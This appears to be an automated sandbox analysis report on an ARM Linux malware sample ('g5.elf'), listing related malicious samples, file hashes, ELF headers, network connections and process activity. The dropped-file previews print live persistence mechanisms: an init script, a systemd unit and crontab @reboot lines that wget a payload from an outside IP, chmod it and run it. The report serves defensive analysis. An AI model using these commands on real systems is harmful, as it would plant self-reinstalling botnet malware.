                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        CLOUDFLARENETUSrCHARTERREQUEST.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.26.12.205
                        https://app-nadexlxogi.webflow.io/Get hashmaliciousUnknownBrowse
                        • 172.64.151.8
                        https://postaboutx.com/Get hashmaliciousUnknownBrowse
                        • 172.67.134.64
                        https://informed.deliveryerz.top/us/Get hashmaliciousUnknownBrowse
                        • 104.16.40.28
                        https://informed.deliveryelc.top/us/Get hashmaliciousHTMLPhisherBrowse
                        • 104.21.38.157
                        https://informed.deliveryerw.top/us/Get hashmaliciousUnknownBrowse
                        • 104.16.41.28
                        https://informed.deliveryekg.top/us/Get hashmaliciousHTMLPhisherBrowse
                        • 104.21.41.205
                        https://informed.deliveryewo.top/us/Get hashmaliciousUnknownBrowse
                        • 104.21.32.1
                        https://informed.deliveryele.top/us/Get hashmaliciousHTMLPhisherBrowse
                        • 104.21.20.172
                        https://reserves-page.com/evquyjawGet hashmaliciousHTMLPhisherBrowse
                        • 104.21.16.1
                        CANONICAL-ASGBppc.elfGet hashmaliciousUnknownBrowse
                        • 185.125.190.26
                        mips.elfGet hashmaliciousUnknownBrowse
                        • 91.189.91.42
                        m68k.elfGet hashmaliciousUnknownBrowse
                        • 91.189.91.42
                        t5.elfGet hashmaliciousUnknownBrowse
                        • 185.125.190.26
                        na.elfGet hashmaliciousPrometeiBrowse
                        • 91.189.91.42
                        g1.elfGet hashmaliciousUnknownBrowse
                        • 91.189.91.42
                        x86.elfGet hashmaliciousUnknownBrowse
                        • 91.189.91.42
                        byte.x86.elfGet hashmaliciousMirai, OkiruBrowse
                        • 91.189.91.42
                        na.elfGet hashmaliciousPrometeiBrowse
                        • 91.189.91.42
                        byte.arm5.elfGet hashmaliciousMirai, OkiruBrowse
                        • 91.189.91.42
                        INIT7CHmips.elfGet hashmaliciousUnknownBrowse
                        • 109.202.202.202
                        m68k.elfGet hashmaliciousUnknownBrowse
                        • 109.202.202.202
                        na.elfGet hashmaliciousPrometeiBrowse
                        • 109.202.202.202
                        g1.elfGet hashmaliciousUnknownBrowse
                        • 109.202.202.202
                        x86.elfGet hashmaliciousUnknownBrowse
                        • 109.202.202.202
                        byte.x86.elfGet hashmaliciousMirai, OkiruBrowse
                        • 109.202.202.202
                        na.elfGet hashmaliciousPrometeiBrowse
                        • 109.202.202.202
                        byte.arm5.elfGet hashmaliciousMirai, OkiruBrowse
                        • 109.202.202.202
                        byte.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                        • 109.202.202.202
                        byte.sh4.elfGet hashmaliciousMirai, OkiruBrowse
                        • 109.202.202.202
                        ASGHOSTNETDEg4.elfGet hashmaliciousUnknownBrowse
                        • 77.90.22.16
                        g6.elfGet hashmaliciousUnknownBrowse
                        • 77.90.22.16
                        g3.elfGet hashmaliciousUnknownBrowse
                        • 77.90.22.16
                        ppc.elfGet hashmaliciousMiraiBrowse
                        • 5.175.194.122
                        x86.elfGet hashmaliciousMiraiBrowse
                        • 5.175.146.210
                        m1.elfGet hashmaliciousUnknownBrowse
                        • 77.90.22.16
                        m5.elfGet hashmaliciousUnknownBrowse
                        • 77.90.22.16
                        m2.elfGet hashmaliciousUnknownBrowse
                        • 77.90.22.16
                        Vhl3X1aYeU.exeGet hashmaliciousNjratBrowse
                        • 77.90.22.45
                        build.exeGet hashmaliciousRedLineBrowse
                        • 77.90.22.45
                        No context
                        No context
                        Process:/tmp/g5.elf
                        File Type:Bourne-Again shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):625
                        Entropy (8bit):4.750358259152211
                        Encrypted:false
                        SSDEEP:12:i5BpMp5kTMp5Gu+a6HqaxS259srxylKNVUdURucTyl:ifpMr8MrPd6HqGSAsrxy8bp4
                        MD5:2C6BD8A750846EBF505D7F7F51E2E2EF
                        SHA1:7240776F60C7DBD29490C7F8562686BE353D6172
                        SHA-256:4ECE965B61A431A104AE713AA54936939ECC9E538ED627863BB0C6E6F608EF4D
                        SHA-512:1893A616CB15F1C24913E17F928478F2697CCAB3DD79266DD6CDB36C1E572BCFA5165B78FE5511076E229979F770248E9C133FAAB207E10C989E15CCE93F57B3
                        Malicious:true
                        Reputation:low
                        Preview:#!/bin/bash.### BEGIN INIT INFO.# Provides: hello.# Required-Start: $network $local_fs.# Required-Stop: $network $local_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: hi :).# Description: hello :).### END INIT INFO..case "$1" in. start).rm -rf /tmp/g5; wget http://103.136.41.100/g5 -O /tmp/g5; chmod 777 /tmp/g5; /tmp/g5 >C 2 R -1157128192 A "arm"..p4 > /dev/null 2>&1;" ;;. stop). exit 0. ;;. restart). $0 stop. $0 start. ;;. *). echo "Usage: $0 {start|stop|restart}". exit 1. ;;.esac..exit 0.
                        Process:/tmp/g5.elf
                        File Type:troff or preprocessor input, ASCII text
                        Category:dropped
                        Size (bytes):321
                        Entropy (8bit):5.277165424025108
                        Encrypted:false
                        SSDEEP:6:z8KbX9RZAMGCk4vEuIACLm+fOApF5C1Y0IElsCBLQmWA4Rv:zb9RZADJiIE+moqaxSLHWrv
                        MD5:660D85555FA161F16C034B46585580F0
                        SHA1:3469891C309D9D149219F8D7CFE328386D892706
                        SHA-256:BA2A0AB913BEB7662EC0DC393B50733E274B79D16279DAE3E095EF6AAB2562B0
                        SHA-512:9DDCD8176A4E54E0E0F8177DAD59EEE4A4A55593FC5A6093149CD05B0549E68B320A48F430C80A6E84C73950797D57D406D8AA96F2AA94F77DD04FCBD9019F2B
                        Malicious:false
                        Reputation:low
                        Preview:[Unit].Description=hi.After=network.target..[Service].RemainAfterExit=true.TimeoutSec=30s.Restart=no.ExecStart=/bin/bash -c "sleep 10; rm -rf /tmp/g5; wget http://103.136.41.100/g5 -O /tmp/g5; chmod 777 /tmp/g5; /tmp/g5 >C 2 R -1157128192 A "arm"..p1 > /dev/null 2>&1;".Type=forking..[Install].WantedBy=multi-user.target.
                        Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):76
                        Entropy (8bit):3.7627880354948586
                        Encrypted:false
                        SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                        MD5:D86A1F5765F37989EB0EC3837AD13ECC
                        SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                        SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                        SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                        Process:/tmp/g5.elf
                        File Type:troff or preprocessor input, ASCII text
                        Category:dropped
                        Size (bytes):142
                        Entropy (8bit):4.8281595204973256
                        Encrypted:false
                        SSDEEP:3:SH3YFKKpeMPHRCnTAzSGuVY0IUU0XzemmXFw2sePn:SH3opF5C1Y0IEyW5Cn
                        MD5:26DAE270D6BBA351C9ABCD4E2DE10F28
                        SHA1:463B12019F1DBE539177430A4485376DB410E53A
                        SHA-256:3F07FC8695E862FDF54A386680A6B2C0E9F63CAC8B42376A4E4C8F5E571090E9
                        SHA-512:587AF28DD41501F45DDD0A735E468C9F34CF2A6286EFD194CBF93AEEEC80394840ECD9EEA0651F47A98E1C911305A1EE59A4ADDE5C3F4B489C6826D07F69C268
                        Malicious:true
                        Reputation:low
                        Preview:@rebootrm -rf /tmp/g5; wget http://103.136.41.100/g5 -O /tmp/g5; chmod 777 /tmp/g5; /tmp/g5 >C 2 R -1157128192 A "arm"..p2 > /dev/null 2>&1;".
                        Process:/tmp/g5.elf
                        File Type:zlib compressed data
                        Category:dropped
                        Size (bytes):259
                        Entropy (8bit):3.444115888472326
                        Encrypted:false
                        SSDEEP:6:OgDFg7Y/VUS/FYDF1/VjmsVot/VOArB/VF:OYsS/FQm/
                        MD5:2FCA16CC82EE533E5B9E16BE6C0A42BA
                        SHA1:D5F18A35C0949B52D9F5F180C90CEF99F63A9A4D
                        SHA-256:99640498121DB2DF3361DC794F3EAC54C2A062625C639F9B41D59A38FD03C4B6
                        SHA-512:F88058659F7B9EF7E5425BD63D36B8BDCDDB910F9FEE3A4393A1153D8415E9FEFCB603D74DB49E15F9529713C639BE59483493C8E1A8357E8810C58234B33D3B
                        Malicious:false
                        Reputation:low
                        Preview:8000-1b000 r-xp 00000000 fd:00 531606 /tmp/g5.elf.23000-24000 rw-p 00013000 fd:00 531606 /tmp/g5.elf.24000-2a000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack]..
                        Process:/usr/bin/crontab
                        File Type:troff or preprocessor input, ASCII text
                        Category:dropped
                        Size (bytes):332
                        Entropy (8bit):5.252007673646203
                        Encrypted:false
                        SSDEEP:6:SUrpqoqQjEOP1K8XAEuLuwJOBFQ3pXWJ24iGMQ5UYLtCFt3HYopF5C1Y0IEyW5Cn:8Qj7QEuLut83pXW44UeHLUHYwqaxVz
                        MD5:D2B7DC4CB0FC5F0AE4E5D8591D7349BC
                        SHA1:066CD467E6E3B86C46E48189AC418544D02E754D
                        SHA-256:64FC0EED8C063D68B42C38A5E3BDE664C920DAACE9DFCD1B978D15009CB0C982
                        SHA-512:C7B3DEB37729404037E7223B40A25FD8460CF51FD86BA68CB5A30D436C8A2891B4449A691805EA5D0810AD8A5B6D0EA3B4FAB7708FC381226733D0C8D2C3740A
                        Malicious:true
                        Reputation:low
                        Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (/tmp/crontab.tmp installed on Sun Jan 12 23:42:01 2025).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@rebootrm -rf /tmp/g5; wget http://103.136.41.100/g5 -O /tmp/g5; chmod 777 /tmp/g5; /tmp/g5 >C 2 R -1157128192 A "arm"..p2 > /dev/null 2>&1;".
                        File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                        Entropy (8bit):6.101665361023169
                        TrID:
                        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                        File name:g5.elf
                        File size:79'764 bytes
                        MD5:0947b8ef749b4f928c2050559d7e734c
                        SHA1:1e37a3067e6131106f6d4ae4f98fcc0cd8c6fe8e
                        SHA256:9e9bca63d6c89ee16f353e391e0f8208ecd7e1e98e19672c35f6aa4c8d395738
                        SHA512:a6c95f86670341fc039904197d50b3e7fdaf501924deb4473d956086b484048c0262bdf13c72c228078e066c366e7c35d6c2b6a9c7e328f5ed7bed1b0085fc09
                        SSDEEP:1536:fbSna0PAeU9tsNKeIzB8+O6A+0MniD7hNz8dnLgIZgTeg:j9Ow7zs7hNz8d8JT
                        TLSH:A1730956F9818B52C5D402BB7A1E569E33076BA8E3DE3313DD241B24778B62F0F27906
                        File Content Preview:.ELF..............(.....T...4....5......4. ...(......................-...-...............0...0...0..................Q.td..................................-...L..................@-.,@...0....S..... 0....S.........../..0...0...@..../..5.......0....-.@0....S

                        ELF header

                        Class:ELF32
                        Data:2's complement, little endian
                        Version:1 (current)
                        Machine:ARM
                        Version Number:0x1
                        Type:EXEC (Executable file)
                        OS/ABI:UNIX - System V
                        ABI Version:0
                        Entry Point Address:0x8154
                        Flags:0x4000002
                        ELF Header Size:52
                        Program Header Offset:52
                        Program Header Size:32
                        Number of Program Headers:3
                        Section Header Offset:79244
                        Section Header Size:40
                        Number of Section Headers:13
                        Header String Table Index:12
                        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                        NULL0x00x00x00x00x0000
                        .initPROGBITS0x80940x940x100x00x6AX004
                        .textPROGBITS0x80b00xb00x113800x00x6AX0016
                        .finiPROGBITS0x194300x114300x100x00x6AX004
                        .rodataPROGBITS0x194400x114400x19480x00x2A004
                        .eh_framePROGBITS0x230000x130000x40x00x3WA004
                        .init_arrayINIT_ARRAY0x230040x130040x40x00x3WA004
                        .fini_arrayFINI_ARRAY0x230080x130080x40x00x3WA004
                        .gotPROGBITS0x230100x130100x740x40x3WA004
                        .dataPROGBITS0x230840x130840x4900x00x3WA004
                        .bssNOBITS0x235140x135140x29780x00x3WA004
                        .ARM.attributesARM_ATTRIBUTES0x00x135140x100x00x0001
                        .shstrtabSTRTAB0x00x135240x670x00x0001
                        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                        LOAD0x00x80000x80000x12d880x12d886.12410x5R E0x8000.init .text .fini .rodata
                        LOAD0x130000x230000x230000x5140x2e8c6.01340x6RW 0x8000.eh_frame .init_array .fini_array .got .data .bss
                        GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                        TimestampSource PortDest PortSource IPDest IP
                        Jan 13, 2025 06:41:58.963519096 CET42836443192.168.2.2391.189.91.43
                        Jan 13, 2025 06:41:59.731424093 CET4251680192.168.2.23109.202.202.202
                        Jan 13, 2025 06:42:01.474273920 CET3568753192.168.2.231.1.1.1
                        Jan 13, 2025 06:42:01.479142904 CET53356871.1.1.1192.168.2.23
                        Jan 13, 2025 06:42:01.479218960 CET3568753192.168.2.231.1.1.1
                        Jan 13, 2025 06:42:01.479386091 CET3568753192.168.2.231.1.1.1
                        Jan 13, 2025 06:42:01.484229088 CET53356871.1.1.1192.168.2.23
                        Jan 13, 2025 06:42:01.484273911 CET3568753192.168.2.231.1.1.1
                        Jan 13, 2025 06:42:02.871799946 CET488205625192.168.2.2377.90.22.16
                        Jan 13, 2025 06:42:02.876743078 CET56254882077.90.22.16192.168.2.23
                        Jan 13, 2025 06:42:02.876821041 CET488205625192.168.2.2377.90.22.16
                        Jan 13, 2025 06:42:02.887173891 CET488205625192.168.2.2377.90.22.16
                        Jan 13, 2025 06:42:02.892023087 CET56254882077.90.22.16192.168.2.23
                        Jan 13, 2025 06:42:13.553642035 CET43928443192.168.2.2391.189.91.42
                        Jan 13, 2025 06:42:25.839827061 CET42836443192.168.2.2391.189.91.43
                        Jan 13, 2025 06:42:29.935378075 CET4251680192.168.2.23109.202.202.202
                        Jan 13, 2025 06:42:34.030699015 CET488205625192.168.2.2377.90.22.16
                        Jan 13, 2025 06:42:34.036468029 CET56254882077.90.22.16192.168.2.23
                        Jan 13, 2025 06:42:54.510236979 CET43928443192.168.2.2391.189.91.42
                        Jan 13, 2025 06:43:04.746581078 CET488205625192.168.2.2377.90.22.16
                        Jan 13, 2025 06:43:04.751529932 CET56254882077.90.22.16192.168.2.23
                        Jan 13, 2025 06:43:13.965101004 CET488205625192.168.2.2377.90.22.16
                        Jan 13, 2025 06:43:13.969981909 CET56254882077.90.22.16192.168.2.23
                        Jan 13, 2025 06:43:14.155473948 CET56254882077.90.22.16192.168.2.23
                        Jan 13, 2025 06:43:14.155581951 CET488205625192.168.2.2377.90.22.16
                        Jan 13, 2025 06:43:45.700861931 CET488205625192.168.2.2377.90.22.16
                        Jan 13, 2025 06:43:45.705874920 CET56254882077.90.22.16192.168.2.23

                        System Behavior

                        Start time (UTC):05:41:54
                        Start date (UTC):13/01/2025
                        Path:/tmp/g5.elf
                        Arguments:/tmp/g5.elf
                        File size:4956856 bytes
                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                        Start time (UTC):05:42:00
                        Start date (UTC):13/01/2025
                        Path:/tmp/g5.elf
                        Arguments:-
                        File size:4956856 bytes
                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                        Start time (UTC):05:42:00
                        Start date (UTC):13/01/2025
                        Path:/bin/sh
                        Arguments:sh -c "systemctl daemon-reload > /dev/null 2>&1"
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):05:42:00
                        Start date (UTC):13/01/2025
                        Path:/bin/sh
                        Arguments:-
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):05:42:00
                        Start date (UTC):13/01/2025
                        Path:/usr/bin/systemctl
                        Arguments:systemctl daemon-reload
                        File size:996584 bytes
                        MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                        Start time (UTC):05:42:00
                        Start date (UTC):13/01/2025
                        Path:/tmp/g5.elf
                        Arguments:-
                        File size:4956856 bytes
                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                        Start time (UTC):05:42:00
                        Start date (UTC):13/01/2025
                        Path:/bin/sh
                        Arguments:sh -c "systemctl start hello.service > /dev/null 2>&1"
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):05:42:00
                        Start date (UTC):13/01/2025
                        Path:/bin/sh
                        Arguments:-
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):05:42:00
                        Start date (UTC):13/01/2025
                        Path:/usr/bin/systemctl
                        Arguments:systemctl start hello.service
                        File size:996584 bytes
                        MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                        Start time (UTC):05:42:01
                        Start date (UTC):13/01/2025
                        Path:/tmp/g5.elf
                        Arguments:-
                        File size:4956856 bytes
                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                        Start time (UTC):05:42:01
                        Start date (UTC):13/01/2025
                        Path:/bin/sh
                        Arguments:sh -c "crontab /tmp/crontab.tmp > /dev/null 2>&1"
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):05:42:01
                        Start date (UTC):13/01/2025
                        Path:/bin/sh
                        Arguments:-
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):05:42:01
                        Start date (UTC):13/01/2025
                        Path:/usr/bin/crontab
                        Arguments:crontab /tmp/crontab.tmp
                        File size:43720 bytes
                        MD5 hash:66e521d421ac9b407699061bf21806f5

                        Start time (UTC):05:42:01
                        Start date (UTC):13/01/2025
                        Path:/tmp/g5.elf
                        Arguments:-
                        File size:4956856 bytes
                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                        Start time (UTC):05:42:01
                        Start date (UTC):13/01/2025
                        Path:/bin/sh
                        Arguments:sh -c "/etc/init.d/hello > /dev/null 2>&1"
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):05:42:01
                        Start date (UTC):13/01/2025
                        Path:/bin/sh
                        Arguments:-
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):05:42:01
                        Start date (UTC):13/01/2025
                        Path:/tmp/g5.elf
                        Arguments:-
                        File size:4956856 bytes
                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                        Start time (UTC):05:42:01
                        Start date (UTC):13/01/2025
                        Path:/tmp/g5.elf
                        Arguments:-
                        File size:4956856 bytes
                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                        Start time (UTC):05:42:01
                        Start date (UTC):13/01/2025
                        Path:/tmp/g5.elf
                        Arguments:-
                        File size:4956856 bytes
                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                        Start time (UTC):05:42:01
                        Start date (UTC):13/01/2025
                        Path:/tmp/g5.elf
                        Arguments:-
                        File size:4956856 bytes
                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                        Start time (UTC):05:42:01
                        Start date (UTC):13/01/2025
                        Path:/tmp/g5.elf
                        Arguments:-
                        File size:4956856 bytes
                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                        Start time (UTC):05:41:57
                        Start date (UTC):13/01/2025
                        Path:/usr/bin/xfce4-panel
                        Arguments:-
                        File size:375768 bytes
                        MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                        Start time (UTC):05:41:57
                        Start date (UTC):13/01/2025
                        Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                        Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
                        File size:35136 bytes
                        MD5 hash:ac0b8a906f359a8ae102244738682e76

                        Start time (UTC):05:41:57
                        Start date (UTC):13/01/2025
                        Path:/usr/bin/xfce4-panel
                        Arguments:-
                        File size:375768 bytes
                        MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                        Start time (UTC):05:41:57
                        Start date (UTC):13/01/2025
                        Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                        Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
                        File size:35136 bytes
                        MD5 hash:ac0b8a906f359a8ae102244738682e76

                        Start time (UTC):05:41:57
                        Start date (UTC):13/01/2025
                        Path:/usr/bin/xfce4-panel
                        Arguments:-
                        File size:375768 bytes
                        MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                        Start time (UTC):05:41:57
                        Start date (UTC):13/01/2025
                        Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                        Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
                        File size:35136 bytes
                        MD5 hash:ac0b8a906f359a8ae102244738682e76

                        Start time (UTC):05:41:57
                        Start date (UTC):13/01/2025
                        Path:/usr/bin/xfce4-panel
                        Arguments:-
                        File size:375768 bytes
                        MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                        Start time (UTC):05:41:57
                        Start date (UTC):13/01/2025
                        Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                        Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
                        File size:35136 bytes
                        MD5 hash:ac0b8a906f359a8ae102244738682e76

                        Start time (UTC):05:41:57
                        Start date (UTC):13/01/2025
                        Path:/usr/bin/xfce4-panel
                        Arguments:-
                        File size:375768 bytes
                        MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                        Start time (UTC):05:41:57
                        Start date (UTC):13/01/2025
                        Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                        Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
                        File size:35136 bytes
                        MD5 hash:ac0b8a906f359a8ae102244738682e76

                        Start time (UTC):05:41:57
                        Start date (UTC):13/01/2025
                        Path:/usr/bin/xfce4-panel
                        Arguments:-
                        File size:375768 bytes
                        MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                        Start time (UTC):05:41:57
                        Start date (UTC):13/01/2025
                        Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                        Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
                        File size:35136 bytes
                        MD5 hash:ac0b8a906f359a8ae102244738682e76

                        Start time (UTC):05:42:00
                        Start date (UTC):13/01/2025
                        Path:/usr/lib/systemd/systemd
                        Arguments:-
                        File size:1620224 bytes
                        MD5 hash:9b2bec7092a40488108543f9334aab75

                        Start time (UTC):05:42:00
                        Start date (UTC):13/01/2025
                        Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                        Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                        File size:22760 bytes
                        MD5 hash:3633b075f40283ec938a2a6a89671b0e